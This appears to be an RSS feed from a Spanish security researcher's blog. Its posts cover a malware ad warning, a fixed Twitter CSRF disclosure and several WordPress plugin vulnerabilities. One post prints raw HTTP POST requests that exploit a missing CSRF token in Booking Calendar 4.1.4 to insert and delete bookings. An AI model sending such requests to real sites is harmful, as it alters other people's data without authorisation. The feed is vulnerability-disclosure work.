<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WebSecurityDev &#187; WebSecurityDev</title>
	<atom:link href="/tag/websecuritydev/feed/" rel="self" type="application/rss+xml" />
	<link>https://websecuritydev.com</link>
	<description>WebSecurityDev , Seguridad Informática, Empresa Colombiana con Servicios de Pentesting, Growth Hacking, Social Media Strategy, Desarrollo Web y Hosting.</description>
	<lastBuildDate>Mon, 01 Dec 2014 04:55:34 +0000</lastBuildDate>
	<language>es-ES</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=4.1.1</generator>
	<item>
		<title>Ahora los Malwares Tienen Campaña de Adwords!</title>
		<link>https://websecuritydev.com/ahora-los-malwares-tienen-campana-de-adwords/</link>
		<comments>https://websecuritydev.com/ahora-los-malwares-tienen-campana-de-adwords/#comments</comments>
		<pubDate>Mon, 23 Jun 2014 03:05:13 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Adwords]]></category>
		<category><![CDATA[Campaña]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[WebSecurityDev]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=206</guid>
		<description><![CDATA[<p>Los Malwares se propagan de muchas maneras, ahora hasta realizan campañas en Google Adwords para propagarse. &#160; Gran parte de personas que navegan por internet hoy en día, más de...</p>
<p>The post <a rel="nofollow" href="/ahora-los-malwares-tienen-campana-de-adwords/">Ahora los Malwares Tienen Campaña de Adwords!</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<h2>Los Malwares se propagan de muchas maneras, ahora hasta realizan campañas en Google Adwords para propagarse.</h2>
<p>&nbsp;</p>
<p>Gran parte de personas que navegan por internet hoy en día, más de una vez han tenido experiencias con virus/malwares, y actualmente se conocen muchas técnicas que utilizan estos malware para ejecutarse en su computadora y ahora usan campañas en búsquedas para hacerse en estas.</p>
<p><span id="more-206"></span></p>
<p>Hoy que iba navegando en la internet vi un curioso anuncio en la búsqueda de Google al buscar palabras como “Adobe Photoshop” o “Adobe Dreamveaver”, “adobe illustrator”, etc&#8230; Y  toda la colección de Adobe, son software bastante utilizados y conocidos, que actualmente cuentan con millones de descargas diarias, la cual ahora los ciberdelincuentes usan para “engañar” a las ingenuas víctimas que esperan descargar de manera gratuita algún software de la familia de Adobe.</p>
<p><a href="/wp-content/uploads/2014/06/Adobe-PS.png" rel="prettyPhoto[gallery-IArD]"><img class="wp-image-208 aligncenter" src="/wp-content/uploads/2014/06/Adobe-PS-1024x462.png" alt="Adobe PS" width="639" height="288" /></a></p>
<p>(Error de ortografía en la MetaDescripcion; da que pensar que esto no va andar nada bien)</p>
<p>Donde al abrir la publicidad no sale un portal como este:</p>
<p><a href="/wp-content/uploads/2014/06/Adobe-Ps-Descargar.png" rel="prettyPhoto[gallery-IArD]"><img class="aligncenter  wp-image-211" src="/wp-content/uploads/2014/06/Adobe-Ps-Descargar-1024x476.png" alt="Adobe Ps Descargar" width="672" height="312" /></a></p>
<p>Decidí descargarlo y analizar el .exe con Virustotal y efectivamente:</p>
<p><a href="/wp-content/uploads/2014/06/virus-total.png" rel="prettyPhoto[gallery-IArD]"><img class="aligncenter  wp-image-210" src="/wp-content/uploads/2014/06/virus-total-1024x482.png" alt="virus total" width="690" height="324" /></a></p>
<p>Bueno, Google debería revisar la política a los anunciantes, estuve investigando al respecto y lo que resta aquí es denunciar la publicidad engañosa que de seguro caerá más de un “ingenuo” en la red.</p>
<p>Ya denuncie este tipo de anuncio, pero tan sólo hay que denunciar más y así la eliminaran más rápido, ya saben lo que dicen: “pueblo unido… reporte exitoso”<br />
Y una buena advertencia a todos aquellos que descargan software de adobe…</p>
<p>¡Feliz Noche!</p>
<p>The post <a rel="nofollow" href="/ahora-los-malwares-tienen-campana-de-adwords/">Ahora los Malwares Tienen Campaña de Adwords!</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/ahora-los-malwares-tienen-campana-de-adwords/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hackeando el Twitter Con Un Click.</title>
		<link>https://websecuritydev.com/hackeando-el-twitter-con-un-click/</link>
		<comments>https://websecuritydev.com/hackeando-el-twitter-con-un-click/#comments</comments>
		<pubDate>Wed, 04 Sep 2013 23:43:13 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Colombia]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hackeando]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[Juan David Castro Cantillo]]></category>
		<category><![CDATA[Movile Devices]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[WebSecurityDev]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=167</guid>
		<description><![CDATA[<p>Buenas Noches mis lectores, tenia rato sin escribir, el trabajo , el estudio y mi novia me mantiene ocupado pero aqui volvi para compartirle uno de mis ultimos reportes. El...</p>
<p>The post <a rel="nofollow" href="/hackeando-el-twitter-con-un-click/">Hackeando el Twitter Con Un Click.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Buenas Noches mis lectores, tenia rato sin escribir, el trabajo , el estudio y mi novia me mantiene ocupado pero aqui volvi para compartirle uno de mis ultimos reportes.</p>
<p>El dia de ayer a al las 3:40 pm encontre un <strong>CSRF</strong> en Twitter ,la cual mas tarde me di cuenta que aplicaba a todo. este <strong>CSRF </strong> Permitia que a partir de un link enviado de una cuenta atacante a una cuenta victima fuece hackeada !</p>
<p>realize multiples pruebas y todas salieron positivas , logre grabar un video y al final lo podra vizualizar.</p>
<p>Lo que me sorprendio fue que a las 10 am  de la mañana  (Hora Colombiana ) de dia de hoy  ( 04/09/13 ). Al seguir buscando vulnerabilidades en Twitter esta misma vulnerabilidad de <strong>CRSF</strong> Aplicaba para todo! , realize multiples PoC, <strong>en una logre &#8220;trinar&#8221;, en otra retweetear, en otra cambie el nombre del perfil, en otra la descripcion, todo esto con un simple archivo de html.</strong></p>
<p><strong>Como llege hasta la vulnerabilidad?</strong> estaba leyendo un articulo de mecanismo de doble autentificacion con tu numero de celular decidi intentarlo y mirar las cabezeras y probe eliminando token de seguridad que este tenia y wala! funciono.!</p>
<p>Esta vulnerabilidad consistia en que aun sin tener el token de seguridad valido , la operacion que se estaba solicitando se realizaba. en pocas palabras el token que tenia antes no funcionaba! estaba de lujo. por que esta aunque la borrase de la peticion, la peticion se ejecutaba.</p>
<p>Empezemos con el Reporte.</p>
<p><strong>Titulo: CSRF En Twitter.com</strong></p>
<p>Acerca del Autor: <strong>Dylan Irzi &#8211; Juan David Castro Cantillo. &#8211; Colombiano. </strong></p>
<p><strong>Independent Security Researcher de 17 años de edad, Con Hall Of Fame Owncloud, Microsoft / Adobe .</strong><br />
<strong>De la Ciudad de Barranquilla.</strong></p>
<p>A Quien Afectaban: A Todos los usuarios.</p>
<p>Estatus de la Vulnerabilidad: <strong>Fixed!</strong></p>
<p>Video de Prueba de Concepto:</p>
<p><iframe src="//www.youtube.com/embed/g5Mv_7-NcBE" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p>Bueno depues de eso a las 4 de la tarde hora colombiana, se puso en modo mantemiento para reparar supongo que la vulnerabilidad.</p>
<p><a href="/wp-content/uploads/2013/09/ESTATUS.png" rel="prettyPhoto[gallery-QHkT]"><img class="aligncenter size-full wp-image-168" alt="ESTATUS" src="/wp-content/uploads/2013/09/ESTATUS.png" width="650" height="404" /></a><strong>Correo de Confirmacion y reparacion de vulnerabilidad.</strong></p>
<p><a href="/wp-content/uploads/2013/09/Twitter-fixed.png" rel="prettyPhoto[gallery-QHkT]"><img class="aligncenter size-large wp-image-169" alt="Twitter fixed" src="/wp-content/uploads/2013/09/Twitter-fixed-1024x105.png" width="960" height="98" /></a></p>
<p>Eso ha sido todo el informe. la verdad ahora solo queda esperar que me coloquen en <strong>Hall Of Fame</strong> De  Twitter por WhiteHat. que segun el mail sera en unos dias.</p>
<p>Por Ultimo Agradecer a <strong>@SeguridadBlanca, @SrtadeDylan</strong>, <s>@</s><b>Armand0A , <s>@</s>Maldonad_Jeison, Por ayudarme Probar las PoC.</b><br />
al <strong>Equipo de WebSecurityDev, y a Dios.</strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Att: Dylan Irzi</strong></p>
<p><strong>Independent Security Researche. </strong></p>
<p><strong>Happy Hacking!</strong></p>
<p>The post <a rel="nofollow" href="/hackeando-el-twitter-con-un-click/">Hackeando el Twitter Con Un Click.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/hackeando-el-twitter-con-un-click/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CSRFTester En Accion&#8230;</title>
		<link>https://websecuritydev.com/csrftester-en-accion/</link>
		<comments>https://websecuritydev.com/csrftester-en-accion/#comments</comments>
		<pubDate>Sun, 18 Aug 2013 01:57:14 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Aplicacion]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[CSRFTester]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[XSRF Attack]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=156</guid>
		<description><![CDATA[<p>Bueno Hoy decidi hacer un tutorial de CSRFTester en accion de como usar el aplicacion de CSRFTester 1.0 y algo mas&#8230;</p>
<p>The post <a rel="nofollow" href="/csrftester-en-accion/">CSRFTester En Accion&#8230;</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Bueno Hoy decidi hacer un tutorial de CSRFTester en accion de como usar el aplicacion de CSRFTester 1.0 y algo mas&#8230;</p>
<p><iframe width="420" height="315" src="//www.youtube.com/embed/7wJl7RHJbSA" frameborder="0" allowfullscreen></iframe></p>
<p>The post <a rel="nofollow" href="/csrftester-en-accion/">CSRFTester En Accion&#8230;</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/csrftester-en-accion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</title>
		<link>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/</link>
		<comments>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/#comments</comments>
		<pubDate>Thu, 25 Jul 2013 22:07:13 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=144</guid>
		<description><![CDATA[<p>Hola A Todos mis lectores! Eh estado en las ultimas semana reportando fallos de Cross site scripting y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana...</p>
<p>The post <a rel="nofollow" href="/csrf-plugin-booking-calendar-4-1-4-wordpress/">CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><strong>Hola A Todos mis lectores!</strong></p>
<p>Eh estado en las ultimas semana reportando fallos de <strong>Cross site scripting</strong> y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana pasada que tome el tiempo de fincho ( fin de semana ) para volver a usar plugins y buscar vulneabilidades como en viejos tiempos&#8230;</p>
<p>entonces revisando nuevos plugins en <strong>WordPress</strong> encontre un plugins de calendario. <strong>Booking Calendar 4.1.4</strong>,<strong> </strong>Y al hacer el proseso de prueba me dio buenos resultados.</p>
<p>Este plugin Trabaja con ajax, pero no maneja &#8220;token&#8221; lo cual eh alli el grave error, permitiendo asi Que modificando las cabezeras y enviando contenido por <strong>POST</strong>, sea capaz de realizar modificaciones a la base de datos. esta maneja una tabla especialmente para ella. &#8220;<strong>wp_booking</strong> &#8221;</p>
<p>Ese dia. no puede haber nada mejor &#8221; <strong>Firefox , Live HTTP Header, Firebug y tu Mente para realizar todo las pruebas con ese plugin</strong>&#8221;</p>
<p>El resultado : <strong>Cross-Site Request Forgery For POST.</strong></p>
<p>Ahora que recuerdo NO Intente si era vulnerable a <strong>POST SQLi Injeccion</strong>, :/ Creo que ese dia ya estaba full cansado en la noche para seguir en la prueba. igual si alguien os desea puede seguir mi y completar la labor con ese plugin.</p>
<p>En resumen aqui les dejo el Video!<br />
<iframe src="//www.youtube.com/embed/xfyP83NIVnM" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p><strong>A continuacion el primer codigo del exploit. para añadir un evento al calendario.</strong></p>
[code]POST:<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18<br />
Accept: */*<br />
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation<br />
Content-Length: 311<br />
Connection: keep-alive<br />
Pragma: no-cache<br />
Cache-Control: no-cache</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
ajax_action=INSERT_INTO_TABLE&amp;bktype=1&amp;dates=(DATE)&amp;form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email</p>
<p>%5Eemail1%5test%40gmail.com~text%5Ephone1%5Etest~textarea</p>
<p>%5Edetails1%5Etest&amp;captcha_chalange=&amp;captcha_user_input=&amp;is_send_emeils=1&amp;my_booking_hash=&amp;booking_form_type=&amp;wpdev</p>
<p>_active_locale=es_ES[/code]
[code]Delete:<br />
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php</p>
<p>Post:<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18<br />
Accept: */*<br />
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-</p>
<p>booking&amp;wh_booking_id=4&amp;view_mode=vm_listing&amp;tab=actions<br />
Content-Length: 104<br />
Connection: keep-alive<br />
Pragma: no-cache<br />
Cache-Control: no-cache</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>ajax_action=DELETE_APPROVE&amp;booking_id=4&amp;is_send_emeils=1&amp;denyreason=&amp;user_id=1&amp;wpdev_active_locale=es_ES</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[/code]
<p>The post <a rel="nofollow" href="/csrf-plugin-booking-calendar-4-1-4-wordpress/">CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XSS Reflected En Flattr.</title>
		<link>https://websecuritydev.com/xss-reflected-en-flattr/</link>
		<comments>https://websecuritydev.com/xss-reflected-en-flattr/#comments</comments>
		<pubDate>Sat, 22 Jun 2013 18:32:28 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Flattr]]></category>
		<category><![CDATA[Hacking Etico]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=125</guid>
		<description><![CDATA[<p>XSS Reflected- y creando un formulario falso a partir del XSS https://websecuritydev.com/ By Dylan Irzi</p>
<p>The post <a rel="nofollow" href="/xss-reflected-en-flattr/">XSS Reflected En Flattr.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p style="text-align: left;"><strong>XSS Reflected- y creando un formulario falso a partir del XSS</strong></p>
<p>https://websecuritydev.com/</p>
<p>By Dylan Irzi</p>
<p><iframe width="560" height="315" src="https://www.youtube.com/embed/hWE0VR-EV1U" frameborder="0" allowfullscreen></iframe></p>
<p>The post <a rel="nofollow" href="/xss-reflected-en-flattr/">XSS Reflected En Flattr.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/xss-reflected-en-flattr/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</title>
		<link>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/</link>
		<comments>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/#comments</comments>
		<pubDate>Sat, 22 Jun 2013 18:29:48 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[CP Reservation Calendar]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Plugin]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=122</guid>
		<description><![CDATA[<p>Saludos a todos! la comunidad WebSecurityDev, Estavez le traigo un video de mi investigacion de seguridad de hace unos meses. Que hasta hoy eh decidido publicar. CP Reservation Calendar 1.01...</p>
<p>The post <a rel="nofollow" href="/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/">Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Saludos a todos! la comunidad <strong>WebSecurityDev</strong>, Estavez le traigo un video de mi investigacion de <strong>seguridad</strong> de hace unos meses. Que hasta hoy eh decidido publicar.</p>
<figure id="attachment_855"><a href="/blog/wp-content/uploads/2013/04/cp-calendario.png" rel="prettyPhoto[gallery-IQcu]"><img alt="CP Reservation Calendar Hacked" src="/blog/wp-content/uploads/2013/04/cp-calendario.png" width="654" height="412" /></a><figcaption>CP Reservation Calendar 1.01 Hacked</figcaption></figure>
<p><strong>El Exploit esta actualmente Funcionando. Espero que disfruten y ahora Tenemos Canal de Youtube!</strong></p>
<p style="text-align: center;"><span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='1080' height='638' src='https://www.youtube.com/embed/Y6Ip1ptb9No?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0' allowfullscreen='true'></iframe></span>
<p>The post <a rel="nofollow" href="/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/">Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk: enhanced
Database Caching 10/41 queries in 0.111 seconds using disk
Object Caching 2628/2719 objects using disk

 Served from: websecuritydev.com @ 2015-03-22 14:57:24 by W3 Total Cache -->